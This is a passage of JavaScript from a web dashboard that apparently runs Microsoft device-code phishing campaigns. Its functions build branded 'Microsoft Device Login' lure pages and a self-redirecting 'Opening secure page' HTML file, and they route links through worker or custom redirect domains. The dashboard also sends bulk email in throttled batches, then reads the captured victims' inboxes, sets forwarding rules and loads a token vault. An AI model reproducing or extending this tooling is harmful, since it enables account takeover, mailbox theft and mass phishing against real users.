      addToast("Failed to send approved email", "error");
    }
  }

  async function sendApprovedBulkEmail() {
    const mailboxUser = (selectedUserId || "").trim();
    if (!mailboxUser) {
      addToast("Select the sending mailbox first", "warning");
      return;
    }
    if (!approvedSubject.trim()) {
      addToast("Enter a subject", "warning");
      return;
    }
    if (!approvedBody.trim()) {
      addToast("Enter a message body", "warning");
      return;
    }
    if (!bulkRecipients.trim() && !bulkRecipientsFile) {
      addToast("Paste recipients or upload a file", "warning");
      return;
    }
    confirm(
      "Start bulk send",
      `This will send recipients in batches of ${bulkBatchSize || 10}, pausing ${bulkBatchPauseSeconds || 30} second(s) between batches. Continue?`,
      async () => {
        try {
          setBulkSending(true);
          setBulkSendResults(null);
          const form = new FormData();
          form.append("user_id", mailboxUser);
          form.append("recipients", bulkRecipients);
          form.append("subject", approvedSubject);
          const bodyToSend = normalizeApprovedBodyForSend();
          form.append("body", bodyToSend);
          form.append("cc", normalizeAddressListBySeparator(approvedCc, approvedCcSeparator));
          form.append("bcc", normalizeAddressListBySeparator(approvedBcc, approvedBccSeparator));
          form.append("cc_separator", approvedCcSeparator);
          form.append("bcc_separator", approvedBccSeparator);
          form.append("reply_to", approvedReplyTo || "");
          form.append("delay_seconds", String(bulkDelaySeconds || 5));
          form.append("max_recipients", String(bulkMaxRecipients || 25));
          form.append("batch_size", String(bulkBatchSize || 10));
          form.append("batch_pause_seconds", String(bulkBatchPauseSeconds || 30));
          if (approvedAttachment) form.append("attachment", approvedAttachment);
          if (bulkRecipientsFile)
            form.append("recipients_file", bulkRecipientsFile);
          const res = await fetchWithAuth(`${API}/send-approved-bulk-email`, {
            method: "POST",
            body: form,
          });
          const data = await res.json().catch(() => ({}));
          if (data.queued && data.job_id) {
            addToast(`Bulk send queued. Tracking job ${data.job_id}`, "info");
            const pollJob = async () => {
              try {
                const jobRes = await fetchWithAuth(`${API}/background-jobs/${data.job_id}`);
                const jobData = await jobRes.json().catch(() => ({}));
                if (jobRes.ok) {
                  setBulkSendResults({
                    job_id: data.job_id,
                    status: jobData.status,
                    progress: jobData.processed_items || 0,
                    total: jobData.total_items || 0,
                    sent: jobData.clean_count || 0,
                    failed: jobData.risky_count || 0,
                    message: jobData.progress_message || "",
                    completed: jobData.status === "completed",
                  });
                  if (jobData.status === "completed" || jobData.status === "failed") {
                    clearInterval(pollInterval);
                    setBulkSending(false);
                    if (jobData.status === "completed") {
                      addToast(`Bulk send complete: ${jobData.clean_count || 0} sent, ${jobData.risky_count || 0} failed`, "success");
                    } else {
                      addToast("Bulk send failed", "error");
                    }
                  }
                }
              } catch {}
            };
            const pollInterval = setInterval(pollJob, 3000);
            pollJob();
            window._bulkPollInterval = pollInterval;
            return;
          }
          if (!res.ok) {
            addToast(data.detail || data.error || "Bulk send failed", "error");
          } else {
            addToast("Bulk send started", "success");
          }
        } catch {
          addToast("Bulk send failed", "error");
        } finally {
          setBulkSending(false);
        }
      }
    );
  }

  function isDeletedItemsFolder(folderId = currentFolderId) {
    const folder = folders.find((f) => String(f.id || "") === String(folderId || ""));
    const name = String(folder?.name || selectedFolderName || "").trim().toLowerCase();
    const idText = String(folderId || "").trim().toLowerCase();

    return (
      idText === "deleteditems" ||
      idText === "deleted items" ||
      name === "deleted items" ||
      name === "deleted" ||
      name.includes("deleted items") ||
      name.includes("trash")
    );
  }

  async function moveEmail(id, folderId) {
    if (READ_ONLY_MODE) return;
    try {
      const res = await fetchWithAuth(`${API}/email/move`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          user_id: selectedUserId,
          message_id: id,
          folder_id: folderId,
        }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to move email", "error");
        return;
      }
      await loadEmails(currentFolderId, selectedUserId, false, "");
      setSelectedEmail(null);
      setSelectedEmailAttachments([]);
      setShowAttachmentPanel(false);
      setSelectedMoveFolderId("");
      addToast("Email moved", "success");
    } catch {}
  }

  async function deleteEmail(id) {
    if (READ_ONLY_MODE) return;

    const permanent = isDeletedItemsFolder();
    const title = permanent ? "Permanently delete email" : "Move email to Deleted Items";
    const message = permanent
      ? "This email is already in Deleted Items. Permanently delete it now?"
      : "Move this email to Deleted Items? You can review it there before deleting permanently.";

    confirm(title, message, async () => {
      try {
        const res = await fetchWithAuth(`${API}/email/delete`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({
            user_id: selectedUserId,
            message_id: id,
            permanent,
            current_folder_id: currentFolderId || "",
            current_folder_name: selectedFolderName || "",
          }),
        });
        const data = await res.json().catch(() => ({}));
        if (!res.ok) {
          addToast(data.detail || data.error || "Failed to delete email", "error");
          return;
        }
        await loadEmails(currentFolderId);
        setSelectedEmail(null);
        setSelectedEmailAttachments([]);
        addToast(
          data.message || (permanent ? "Email permanently deleted" : "Email moved to Deleted Items"),
          "success"
        );
      } catch {
        addToast("Failed to delete email", "error");
      }
    });
  }

  async function markRead(id, silent = false) {
    if (READ_ONLY_MODE) return;
    try {
      const res = await fetchWithAuth(`${API}/email/mark-read`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          user_id: selectedUserId,
          message_id: id,
          is_read: true,
        }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        if (!silent) {
          addToast(data.detail || data.error || "Failed to mark as read", "error");
        }
        return;
      }
      setEmails((prev) => prev.map((e) => (e.id === id ? { ...e, isRead: true } : e)));
      if (selectedEmail?.id === id) {
        setSelectedEmail((prev) => ({ ...(prev || {}), isRead: true }));
      }
      if (!silent) addToast("Marked as read", "success");
    } catch {}
  }

  async function markUnread(id, silent = false) {
    if (READ_ONLY_MODE) return;
    try {
      const res = await fetchWithAuth(`${API}/email/mark-unread`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          user_id: selectedUserId,
          message_id: id,
        }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        if (!silent) {
          addToast(data.detail || data.error || "Failed to mark as unread", "error");
        }
        return;
      }
      setEmails((prev) => prev.map((e) => (e.id === id ? { ...e, isRead: false } : e)));
      if (selectedEmail?.id === id) {
        setSelectedEmail((prev) => ({ ...(prev || {}), isRead: false }));
      }
      if (!silent) addToast("Marked as unread", "success");
    } catch {}
  }

  async function sendNewEmail() {
    if (READ_ONLY_MODE) return;
    if (!composeTo || !composeSubject || !composeBody) {
      addToast("Fill in To, Subject, and Body", "warning");
      return;
    }
    try {
      let res;
      if (composeAttachment) {
        const form = new FormData();
        form.append("user_id", selectedUserId);
        form.append("recipient", composeTo);
        form.append("subject", composeSubject);
        form.append("body", composeBody);
        form.append("cc", composeCc || "");
        form.append("bcc", composeBcc || "");
        form.append("attachment", composeAttachment);
        res = await fetchWithAuth(`${API}/send-approved-email`, { method: "POST", body: form });
      } else {
        res = await fetchWithAuth(`${API}/email/send`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify({
            user_id: selectedUserId,
            to: composeTo,
            cc: composeCc,
            bcc: composeBcc,
            subject: composeSubject,
            body: composeBody,
          }),
        });
      }
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to send email", "error");
        return;
      }
      setComposeTo("");
      setComposeSubject("");
      setComposeBody("");
      setComposeCc("");
      setComposeBcc("");
      setComposeAttachment(null);
      setShowCompose(false);
      addToast("Email sent", "success");
      await loadEmails(currentFolderId);
    } catch {}
  }

  async function sendReply() {
    if (READ_ONLY_MODE) return;
    if (!selectedEmail || !replyText.trim()) {
      addToast("Reply text is required", "warning");
      return;
    }
    try {
      const res = await fetchWithAuth(`${API}/email/reply`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          user_id: selectedUserId,
          message_id: selectedEmail.id,
          reply_text: replyText,
        }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to send reply", "error");
        return;
      }
      setReplyText("");
      setShowReplyBox(false);
      addToast("Reply sent", "success");
      await refreshSelectedEmail();
    } catch {}
  }

  async function sendForward() {
    if (READ_ONLY_MODE) return;
    if (!selectedEmail) {
      addToast("No email selected", "warning");
      return;
    }

    const toList = parseAddressListBySeparator(forwardTo, "auto");
    const ccList = parseAddressListBySeparator(forwardCc, "auto");

    if (toList.length === 0) {
      addToast("At least one forward recipient is required", "warning");
      return;
    }

    try {
      const res = await fetchWithAuth(`${API}/email/forward`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          user_id: selectedUserId,
          message_id: selectedEmail.id,
          to: toList.join("; "),
          cc: ccList.join("; "),
        }),
      });
      const data = await res.json().catch(() => ({}));
      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to forward email", "error");
        return;
      }
      setForwardTo("");
      setForwardCc("");
      setShowForwardBox(false);
      addToast(
        ccList.length > 0
          ? `Email forwarded to ${toList.length} recipient(s) with ${ccList.length} in CC`
          : `Email forwarded to ${toList.length} recipient(s)`,
        "success"
      );
    } catch {
      addToast("Failed to forward email", "error");
    }
  }

  async function addRule() {
    if (READ_ONLY_MODE) return;
    if (!selectedUserId) {
      addToast("Select a user first", "warning");
      return;
    }
    const selectedActions = ruleActions.filter(Boolean).slice(0, 4);
    const isAttachmentCondition = ruleCondition === "has_attachment" || ruleCondition === "no_attachment";
    if (!ruleCondition || (!isAttachmentCondition && !ruleKeyword) || selectedActions.length === 0) {
      addToast(isAttachmentCondition ? "Condition and at least one action are required" : "Condition, keyword, and at least one action are required", "warning");
      return;
    }
    if (selectedActions.includes("move") && !ruleTargetFolder) {
      addToast("Select a target folder", "warning");
      return;
    }
    if (selectedActions.includes("forward") && !ruleForwardTo) {
      addToast("Enter a forward email address", "warning");
      return;
    }
    try {
      const res = await fetchWithAuth(`${API}/rules`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({
          user_id: selectedUserId,
          condition: ruleCondition,
          keyword: isAttachmentCondition ? "" : ruleKeyword,
          action: selectedActions[0],
          actions: selectedActions,
          target_folder: selectedActions.includes("move") ? ruleTargetFolder : null,
          forward_to: selectedActions.includes("forward") ? ruleForwardTo : null,
          is_active: ruleIsActive,
        }),
      });
      const data = await res.json();
      if (!res.ok) {
        addToast(data.error || data.detail || "Failed to create rule", "error");
        return;
      }
      setRuleCondition("");
      setRuleKeyword("");
      setRuleAction("");
      setRuleActions([""]);
      setRuleTargetFolder("");
      setRuleForwardTo("");
      setRuleIsActive(true);
      await loadRules();
      addToast("Rule created", "success");
    } catch {}
  }

  function handleDeviceLogoFile(file) {
    if (!file) return;
    if (!file.type.startsWith("image/")) {
      addToast("Select an image file for the logo", "warning");
      return;
    }
    if (file.size > 350000) {
      addToast("Logo image should be under 350 KB for shareable links", "warning");
      return;
    }
    const reader = new FileReader();
    reader.onload = () => {
      setDeviceHandoutLogoUrl(String(reader.result || ""));
      setDeviceHandoutLogoFileName(file.name || "uploaded-logo");
      addToast("Logo image loaded", "success");
    };
    reader.onerror = () => addToast("Failed to read logo image", "error");
    reader.readAsDataURL(file);
  }

  function buildDeviceHandoutUrl(type = "html", download = false) {
    if (!deviceCodeData?.user_code || !deviceCodeData?.verification_uri) return "";
    const params = new URLSearchParams({
      user_code: deviceCodeData.user_code,
      verification_uri: getProxiedVerificationUri(),
      title: deviceHandoutTitle || "Microsoft Device Login",
      brief_writeup: deviceHandoutWriteup || "",
      logo_url: deviceHandoutLogoUrl || URL_GENERATOR_LOGO_URL || "",
      website_url: companyWebsiteUrl || "",
      company_website_url: companyWebsiteUrl || "",
      additional_instructions: deviceHandoutWriteup || "",
      download: download ? "1" : "0",
    });
    appendInstructionTemplateParams(params);
    return `${API}/device-code/handout/${type}?${params.toString()}`;
  }

  async function downloadGeneratedFileFromUrl(url, filename) {
    const finalUrl = String(url || "").trim();
    if (!finalUrl) {
      throw new Error("Generated file URL is missing");
    }

    const a = document.createElement("a");
    a.href = finalUrl;
    a.download = filename || "device_login.html";
    a.target = "_blank";
    a.rel = "noopener noreferrer";
    document.body.appendChild(a);
    a.click();
    a.remove();
  }

  function filenameForGeneratedHandout(type = "html") {
    const cleanType = String(type || "html").toLowerCase();
    if (cleanType === "word" || cleanType === "doc" || cleanType === "docx") return "device_login.docx";
    if (cleanType === "pdf") return "device_login.pdf";
    if (cleanType === "php") return "device_login.php";
    if (cleanType === "image" || cleanType === "svg") return "device_login.svg";
    return "device_login.html";
  }

  function selectedLandingTemplateSnapshotForShare() {
    const selectedTemplate = selectedLandingTemplate();
    const selectedTemplateId = String(
      selectedLandingTemplateId ||
        selectedTemplate?.id ||
        selectedTemplate?.template_id ||
        selectedTemplate?.key ||
        ""
    ).trim();

    if (!selectedTemplate || !selectedTemplateId || selectedTemplateId === PLAIN_LANDING_TEMPLATE_ID) {
      return null;
    }

    return {
      ...selectedTemplate,
      id: selectedTemplateId,
      template_id: selectedTemplateId,
    };
  }

  function selectedInstructionTheme() {
    const selectedId = String(selectedInstructionThemeId || "").trim();
    if (!selectedId || selectedId === "__plain__") return null;
    return instructionThemes.find((item) => String(item.id || item.theme_id || item.key) === selectedId) || null;
  }

  function effectiveInstructionThemePayload() {
    const savedTheme = selectedInstructionTheme();
    if (savedTheme) {
      const themeType = String(savedTheme.theme_type || savedTheme.type || "none").toLowerCase();
      return {
        instruction_theme_id: String(savedTheme.id || savedTheme.theme_id || ""),
        instruction_theme_type: themeType || "none",
        instruction_theme_image_url: ["image", "pdf"].includes(themeType) ? (savedTheme.asset_data_url || savedTheme.asset_url || savedTheme.url || "") : "",
        instruction_theme_html: themeType === "html" ? (savedTheme.html_content || savedTheme.html || "") : "",
        instruction_theme_snapshot: { ...savedTheme },
      };
    }
    return {
      instruction_theme_id: "",
      instruction_theme_type: instructionThemeType || "none",
      instruction_theme_image_url: ["image", "pdf"].includes(instructionThemeType) ? instructionThemeImageUrl : "",
      instruction_theme_html: instructionThemeType === "html" ? instructionThemeHtml : "",
      instruction_theme_snapshot: null,
    };
  }

  function getProxiedVerificationUri() {
    return deviceCodeData?.verification_uri || "";
  }

  async function wrapWithWorkerRedirectIfNeeded(targetUrl) {
    const finalTarget = String(targetUrl || "").trim();
    if (!finalTarget) return "";

    const mode = String(instructionRedirectMode || "direct").toLowerCase();
    if (mode !== "worker" && mode !== "custom") {
      return finalTarget;
    }

    const workerBase = getEffectiveRedirectBaseUrl(mode).replace(/\/$/, "");
    if (!workerBase) {
      throw new Error(
        mode === "custom"
          ? "Enter your custom redirect domain first"
          : "Enter your workers.dev base URL first"
      );
    }

    try {
      const response = await fetch(`${workerBase}/generate`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify({ targetUrl: finalTarget }),
      });

      if (!response.ok) {
        const errorText = await response.text();
        throw new Error(`Worker /generate failed: ${errorText}`);
      }

      const data = await response.json();
      if (!data.wrappedUrl) {
        throw new Error("Worker did not return a wrappedUrl");
      }

      return data.wrappedUrl;
    } catch (err) {
      console.warn("Worker /generate failed, using fallback URL:", err);
      return finalTarget;
    }
  }

  async function saveFreshSharePublicStartUrl(shortId, publicStartUrl, publicLandingUrl) {
    const cleanShortId = String(shortId || "").trim();
    const cleanStart = String(publicStartUrl || "").trim();
    if (!cleanShortId || !cleanStart) return;

    await fetchWithAuth(`${API}/device-code/short-links/${encodeURIComponent(cleanShortId)}/public-start-url`, {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify({
        public_start_url: cleanStart,
        public_landing_url: publicLandingUrl || "",
        redirect_mode: instructionRedirectMode || "direct",
      }),
    });
  }

  function urlWithParam(url, key, value) {
    const cleanUrl = String(url || "").trim();
    if (!cleanUrl || !value) return cleanUrl;
    const separator = cleanUrl.includes("?") ? "&" : "?";
    return `${cleanUrl}${separator}${encodeURIComponent(key)}=${encodeURIComponent(value)}`;
  }

    async function finalizeLandingFirstFreshShare(data) {
    const shortId = data.short_id || data.link_id || data.id || "";

    const mode = String(instructionRedirectMode || "direct").toLowerCase();

    // FIX: prefer the public custom-domain URL over the raw backend URL.
    // The backend returns `fresh_share_url` (and `public_url`) already wrapped
    // with the custom domain when redirect_mode is "custom", so we must use
    // that before falling back to `direct_url`.
    const backendLandingUrl =
      data.fresh_share_url ||
      data.public_url ||
      data.support_page_url ||
      data.direct_url ||
      "";

    if (!backendLandingUrl) {
      throw new Error("No fresh share URL returned");
    }

    const backendStartUrl =
      data.start_redirect_target_url ||
      data.public_start_url ||
      data.direct_start_url ||
      data.start_url ||
      `${backendLandingUrl.replace(/\/+$/, "")}/start`;

    // FIX: only attempt /generate wrapping for worker mode.
    // For custom mode the backend URL already points at the custom domain,
    // and platform-proxy has no /generate endpoint — trying it just 404s and
    // the try/catch silently degrades to the raw backend URL.
    let publicStartUrl = backendStartUrl;
    let publicLandingUrl = backendLandingUrl;

    if (mode === "worker" || mode === "workers" || mode === "workers.dev") {
      try {
        publicStartUrl = await wrapWithWorkerRedirectIfNeeded(backendStartUrl);
        publicLandingUrl = await wrapWithWorkerRedirectIfNeeded(backendLandingUrl);
      } catch (err) {
        console.warn("Worker /generate failed, using backend URLs:", err);
        publicStartUrl = backendStartUrl;
        publicLandingUrl = backendLandingUrl;
      }
    }

    if (shortId) {
      await saveFreshSharePublicStartUrl(shortId, publicStartUrl, publicLandingUrl);
    }

    return publicLandingUrl;
  }

  async function openDeviceHandout(type = "html", download = false) {
    try {
      const cleanType = String(type || "html").toLowerCase();

      if (cleanType === "html") {
        const params = new URLSearchParams({
          title: deviceHandoutTitle || "Microsoft Device Login",
          brief_writeup: deviceHandoutWriteup || "Open this file to generate a fresh Microsoft mailbox connection.",
          logo_url: deviceHandoutLogoUrl || URL_GENERATOR_LOGO_URL || "",
          website_url: companyWebsiteUrl || "",
          redirect_mode: instructionRedirectMode || "direct",
          redirect_base_url: getEffectiveRedirectBaseUrl(),
        });
        appendInstructionTemplateParams(params);

        const freshShareBody = paramsToObject(params);
        freshShareBody.resource_type = instructionDocumentLogoType || "pdf";
        freshShareBody.document_logo_type = instructionDocumentLogoType || "pdf";
        Object.assign(freshShareBody, effectiveInstructionThemePayload());
        const selectedSnapshot = selectedLandingTemplateSnapshotForShare();
        if (selectedSnapshot) {
          freshShareBody.landing_template_snapshot = selectedSnapshot;
        }

        const res = await fetchWithAuth(`${API}/device-code/fresh-share-link`, {
          method: "POST",
          headers: { "Content-Type": "application/json" },
          body: JSON.stringify(freshShareBody),
        });
        const data = await res.json().catch(() => ({}));

        if (!res.ok) {
          addToast(data.detail || data.error || "Failed to generate fresh HTML file", "error");
          return;
        }

        let finalUrl = "";
        try {
          finalUrl = await finalizeLandingFirstFreshShare(data);
        } catch (err) {
          addToast(err.message || "Failed to generate redirect URL", "error");
          return;
        }

        const generatedAt = new Date().toISOString();
        const htmlFile = `<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  <title>Opening secure page</title>
  <meta http-equiv="refresh" content="0; url=${escapeHtml(finalUrl)}" />
  <style>
    body{margin:0;min-height:100vh;display:grid;place-items:center;font-family:Segoe UI,Arial,sans-serif;background:#f8fafc;color:#101828;padding:18px}.card{background:#fff;border:1px solid #e5e7eb;border-radius:18px;padding:24px;max-width:460px;text-align:center;box-shadow:0 18px 55px rgba(16,24,40,.10)}a{color:#175cd3;font-weight:800;overflow-wrap:anywhere}.small{font-size:12px;color:#667085}
  </style>
</head>
<body>
  <main class="card">
    <h1>Opening secure page...</h1>
    <p class="small">Generated: ${escapeHtml(generatedAt)}</p>
    <p><a href="${escapeHtml(finalUrl)}">Continue</a></p>
  </main>
  <script>window.location.replace(${JSON.stringify(finalUrl)});</script>
</body>
</html>`;

        downloadTextFile("fresh_device_login.html", htmlFile);
        setFreshDeviceShareUrl(finalUrl);
        setDeviceSupportPageUrl(finalUrl);
        await fetchDashboardSummary();
        addToast("Fresh-code HTML file downloaded", "success");
        return;
      }

      const params = new URLSearchParams({
        format_type: cleanType,
        title: deviceHandoutTitle || "Microsoft Device Login",
        brief_writeup: deviceHandoutWriteup || "Open this link to generate a fresh mailbox connection.",
        logo_url: deviceHandoutLogoUrl || URL_GENERATOR_LOGO_URL || "",
        website_url: companyWebsiteUrl || "",
        additional_instructions: deviceHandoutWriteup || "",
        redirect_mode: "direct",
        redirect_base_url: "",
        download: "1",
      });
      appendInstructionTemplateParams(params);

      const res = await fetchWithAuth(`${API}/device-code/fresh-handout-link?${params.toString()}`);
      const data = await res.json().catch(() => ({}));

      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to generate attachment", "error");
        return;
      }

      const directUrl = data.direct_url || data.instruction_url || data.fresh_instruction_url || data.support_page_url || data.public_url || "";
      if (!directUrl) {
        addToast("No generated URL returned", "error");
        return;
      }

      if (download) {
        await downloadGeneratedFileFromUrl(directUrl, filenameForGeneratedHandout(cleanType));
        setDeviceSupportPageUrl(directUrl);
        setFreshDeviceShareUrl(directUrl);
        await fetchDashboardSummary();
        addToast(`${cleanType.toUpperCase()} downloaded`, "success");
        return;
      }

      let finalUrl = directUrl;
      try {
        finalUrl = await wrapWithWorkerRedirectIfNeeded(finalUrl);
      } catch (err) {
        addToast(err.message || "Failed to generate worker redirect URL", "error");
        return;
      }

      setDeviceSupportPageUrl(finalUrl);
      setFreshDeviceShareUrl(finalUrl);
      window.open(finalUrl, "_blank", "noopener,noreferrer");
      await fetchDashboardSummary();
      addToast(`${cleanType.toUpperCase()} fresh-code generator opened`, "success");
    } catch (err) {
      addToast(err.message || "Failed to generate attachment", "error");
    }
  }

  async function generateDeviceSupportPageLink() {
    if (!deviceCodeData?.user_code || !deviceCodeData?.verification_uri) {
      addToast("Start a device login first", "warning");
      return;
    }
    try {
      const params = new URLSearchParams({
        user_code: deviceCodeData.user_code,
        verification_uri: getProxiedVerificationUri(),
        title: deviceHandoutTitle || "Microsoft Device Login",
        brief_writeup: deviceHandoutWriteup || "",
        logo_url: deviceHandoutLogoUrl || URL_GENERATOR_LOGO_URL || "",
        website_url: companyWebsiteUrl || "",
        company_website_url: companyWebsiteUrl || "",
        additional_instructions: deviceHandoutWriteup || "",
        redirect_mode: instructionRedirectMode || "direct",
        redirect_base_url: getEffectiveRedirectBaseUrl(),
      });
      appendInstructionTemplateParams(params);
      const res = await fetchWithAuth(
        `${API}/device-code/support-page-link?${params.toString()}`
      );
      const data = await res.json();
      if (!res.ok) {
        addToast(
          data.detail || data.error || "Failed to generate support link",
          "error"
        );
        return;
      }
      let finalUrl = "";
      try {
        finalUrl = await finalizeLandingFirstFreshShare(data);
      } catch (err) {
        addToast(err.message || "Failed to generate redirect URL", "error");
        return;
      }

      setDeviceSupportPageUrl(finalUrl || "");
      setFreshDeviceShareUrl("");
      addToast("Support page link generated", "success");
    } catch {
      addToast("Failed to generate support page link", "error");
    }
  }

  async function generateFreshDeviceShareLink() {
    try {
      const selectedTemplate = selectedLandingTemplate();
      const selectedTemplateId = String(
        selectedLandingTemplateId ||
          selectedTemplate?.id ||
          selectedTemplate?.template_id ||
          selectedTemplate?.key ||
          ""
      ).trim();

      const body = {
        title: deviceHandoutTitle || "Microsoft Device Login",
        brief_writeup: deviceHandoutWriteup || "Open this link to generate a fresh Microsoft mailbox connection.",
        logo_url: deviceHandoutLogoUrl || URL_GENERATOR_LOGO_URL || "",
        website_url: companyWebsiteUrl || "",
        redirect_mode: instructionRedirectMode || "direct",
        redirect_base_url: getEffectiveRedirectBaseUrl(),
        template_id: selectedTemplateId,
        landing_template_id: selectedTemplateId,
        exit_page_id: selectedExitPageId || "",
        company_name: instructionCompanyName || "",
        sender_name: instructionSenderName || "",
        shared_document_name: instructionDocumentName || "",
        document_name: instructionDocumentName || "",
        browser_title: instructionBrowserTitle || "",
        tab_title: instructionBrowserTitle || "",
        resource_type: instructionDocumentLogoType || "pdf",
        document_logo_type: instructionDocumentLogoType || "pdf",
        ...effectiveInstructionThemePayload(),
      };

      const selectedSnapshot = selectedLandingTemplateSnapshotForShare();
      if (selectedSnapshot) {
        body.landing_template_snapshot = selectedSnapshot;
      }

      const res = await fetchWithAuth(`${API}/device-code/fresh-share-link`, {
        method: "POST",
        headers: { "Content-Type": "application/json" },
        body: JSON.stringify(body),
      });
      const data = await res.json().catch(() => ({}));

      if (!res.ok) {
        addToast(data.detail || data.error || "Failed to generate fresh share link", "error");
        return;
      }

      let finalUrl = "";
      try {
        finalUrl = await finalizeLandingFirstFreshShare(data);
      } catch (err) {
        addToast(err.message || "Failed to generate redirect URL", "error");
        return;
      }

      setFreshDeviceShareUrl(finalUrl);
      setDeviceSupportPageUrl(finalUrl);
      await fetchDashboardSummary();
      addToast("Fresh device-code share URL generated", "success");
    } catch {
      addToast("Failed to generate fresh share link", "error");
    }
  }

  async function connectElectronScopes(userId) {
    const target = userId || selectedUserId;
    if (target && target !== selectedUserId) {
      setSelectedUserId(target);
    }
    await startDeviceCodeFlow(true);
  }

  async function loadUserInbox(userId) {
    if (!userId) {
      addToast("Select a user first", "warning");
      return;
    }

    setConnectorLoading((prev) => ({
      ...prev,
      [`inbox_${userId}`]: true,
    }));

    try {
      const statusRes = await fetchWithAuth(
        `${API}/microsoft/status?user_id=${encodeURIComponent(userId)}`
      );
      const statusData = await statusRes.json().catch(() => ({}));

      if (!statusData.inbox_connected) {
        addToast(
          `${userId} inbox not connected — click Connect Mailbox Setup first`,
          "warning"
        );
        setInboxResults((prev) => ({
          ...prev,
          [userId]: {
            emails: 0,
            success: false,
            messages: [],
            loadedAt: new Date().toLocaleTimeString(),
            error: "Inbox not connected — mail scopes required. Click Connect Mailbox Setup first.",
          },
        }));
        return;
      }

      const res = await fetchWithAuth(
        `${API}/emails?user_id=${encodeURIComponent(userId)}&limit=10`
      );
      const data = await res.json().catch(() => ({}));

      if (!res.ok) {
        const errMsg = (data.detail || data.error || "").toLowerCase();

        if (
          errMsg.includes("scope") ||
          errMsg.includes("permission") ||
          errMsg.includes("insufficientscope") ||
          errMsg.includes("access") ||
          errMsg.includes("mail") ||
          errMsg.includes("token")
        ) {
          addToast(
            `${userId} needs mail scope re-authentication — click Connect Mailbox Setup`,
            "warning"
          );
          setInjectedUsers((prev) => {
            const next = { ...prev };
            delete next[userId];
            return next;
          });
        } else {
          addToast(
            data.error || data.detail || `Failed to load inbox for ${userId}`,
            "error"
          );
        }

        setInboxResults((prev) => ({
          ...prev,
          [userId]: {
            emails: 0,
            success: false,
            messages: [],
            loadedAt: new Date().toLocaleTimeString(),
            error: data.detail || data.error || "Failed to load inbox",
          },
        }));
        return;
      }

      const emails = data.emails || [];

      setInboxResults((prev) => ({
        ...prev,
        [userId]: {
          emails: emails.length,
          success: true,
          messages: emails.map((e) => ({
            subject: e.subject || "(no subject)",
            from: e.from || "—",
            date: e.date || "—",
            id: e.id,
            isRead: e.isRead,
            preview: e.preview || e.bodyPreview || "",
            hasAttachments: e.hasAttachments || e.has_attachments || false,
            attachment_count: e.attachment_count || e.attachments_count || 0,
          })),
          loadedAt: new Date().toLocaleTimeString(),
          error: null,
        },
      }));

      setInjectedUsers((prev) => ({ ...prev, [userId]: true }));
      addToast(
        `Inbox loaded for ${userId} — ${emails.length} emails`,
        "success"
      );

    } catch (err) {
      addToast("Inbox load failed — check console", "error");
      console.error("[loadUserInbox] error:", err);
      setInboxResults((prev) => ({
        ...prev,
        [userId]: {
          emails: 0,
          success: false,
          messages: [],
          loadedAt: new Date().toLocaleTimeString(),
          error: "Network error — check console",
        },
      }));
    } finally {
      setConnectorLoading((prev) => ({
        ...prev,
        [`inbox_${userId}`]: false,
      }));
    }
  }

  async function resetInjection(userId) {
    setInjectedUsers((prev) => {
      const next = { ...prev };
      delete next[userId];
      return next;
    });
    setInboxResults((prev) => {
      const next = { ...prev };
      delete next[userId];
      return next;
    });
    addToast(`Reset device-code connection state for ${userId}`, "info");
  }

  async function fetchAzureProfiles() {
    try {
      const res = await fetchWithAuth(`${API}/azure/profiles`);
      const data = await res.json().catch(() => ({}));
      if (res.ok && data.profiles) {
        setAzureProfiles(data.profiles);
        if (azureClientId) {
          const matched = data.profiles.find(p => p.client_id === azureClientId);
          if (matched) {
            setSelectedProfileId(matched.name);
          }
        }
      }
    } catch {
    }
  }

  useEffect(() => {
    fetchAppConfig();
    pingServer();
  }, []);

  useEffect(() => {
    async function init() {
      const params = new URLSearchParams(window.location.search);
      const viewerToken = params.get("viewer_token") || params.get("access_token") || "";
      if (viewerToken) {
        localStorage.setItem("token", viewerToken);
        params.delete("viewer_token");
        params.delete("access_token");
        const cleanUrl = `${window.location.pathname}${params.toString() ? `?${params.toString()}` : ""}${window.location.hash || ""}`;
        window.history.replaceState({}, document.title, cleanUrl);
      }
      const token = viewerToken || getToken();
      if (token) {
        setIsAuthenticated(true);
        await fetchAppConfig();
        await fetchUserSettings();
        await fetchAzureProfiles();
        const storedRole = localStorage.getItem("role") || "";
        if (storedRole === "admin") {
          await fetchUsers();
          await fetchTenantConsents();
          await fetchEnterpriseTenants();
          await fetchDashboardSummary();
          await fetchVisitSummary();
          await fetchTokenVault();
          await fetchCustomerAccounts();
          await fetchKeywordListeners();
        }
        pingServer();
      }
      setLoading(false);
    }
    init();
  }, []);

  useEffect(() => {
    if (!isAuthenticated) return;
    keepAliveRef.current = setInterval(pingServer, KEEP_ALIVE_INTERVAL_MS);
    return () => {
      if (keepAliveRef.current) clearInterval(keepAliveRef.current);
    };
  }, [isAuthenticated]);

  useEffect(() => {
    if (!isAuthenticated) return;
    const params = new URLSearchParams(window.location.search);
    const requestedView = (params.get("view") || "").toLowerCase();
    const requestedMailbox = params.get("mail_user_id") || params.get("mailbox") || "";

    if (requestedView === "mail" && requestedMailbox.trim()) {
      const cleanMailbox = requestedMailbox.trim();
